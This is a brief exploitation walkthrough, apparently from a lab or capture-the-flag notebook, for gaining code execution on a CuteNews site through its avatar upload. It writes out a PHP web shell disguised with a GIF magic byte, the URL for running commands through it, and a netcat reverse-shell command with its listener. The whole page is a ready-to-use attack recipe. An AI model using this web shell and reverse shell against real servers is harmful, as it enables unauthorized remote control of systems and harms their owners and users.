Cute News

[1]Navigate to default page and register new user http://10.10.10.10/index.php [2]Register bogus E-mail, user and password [3]If captcha required for registration is malformed or does not show up, find it at .../captcha.php default page [4]Once logged in, click on personal options and find the “avatar” tab [5]Craft a malicious php script “evil.php” | using a magic byte will trick the system into interpreting ascii as a .gif file GIF8; <?php system($_REQUEST['cmd']) ?> [6] Upload malicious file ,checkout folder where the malicious code was uploaded Default location http://10.10.10.10/uploads/avatar_redcliff_evil.php [7] Get command execution http://10.10.10.10/uploads/avatar_redcliff_evil.php?cmd=whoami [8]Revshell http://10.10.10.10/uploads/avatar_redcliff_evilx.php?cmd=nc -e /bin/sh 10.10.10.10 1234 (might need to URL encode)

Catch revshell nc -nvlp 1234

PreviousSar2HTMLNextNagios

Last updated